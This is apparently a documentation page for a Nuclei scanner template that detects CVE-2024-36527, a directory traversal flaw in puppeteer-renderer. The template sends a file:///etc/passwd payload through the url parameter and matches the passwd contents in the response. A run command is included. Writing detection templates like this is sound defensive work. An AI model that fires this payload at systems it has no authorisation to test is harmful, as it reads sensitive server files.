Puppeteer Renderer - Directory Traversal
ID: CVE-2024-36527
Severity: medium
Author: Stux
Tags: cve,cve2024,puppeteer-renderer
Description
Section titled “Description”puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.
YAML Source
Section titled “YAML Source”id: CVE-2024-36527
info: name: Puppeteer Renderer - Directory Traversal author: Stux severity: medium description: | puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server. impact: | An attacker can exploit this vulnerability to read arbitrary files on the server, potentially gaining access to sensitive information. remediation: | Users should update to version 3.3.0 or later where this issue has been addressed. Additionally, ensure that input validation is implemented to restrict the url parameter to only http and https protocols. reference: - https://github.com/zenato/puppeteer-renderer/issues/97 - https://gist.github.com/7a6163/25fef08f75eed219c8ca21e332d6e911 metadata: max-request: 1 verified: true tags: cve,cve2024,puppeteer-renderer
http: - method: GET path: - "{{BaseURL}}/html?url=file:///etc/passwd"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a00463044022006955f980bad3e25c4becf1c65ad9020298ec47002664fbc3da45e8f709d3e8902202085bcd4b690d388512cc3c059d8903fd27ba341ea7ad4517e3aad72f1c04ff7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-36527.yaml"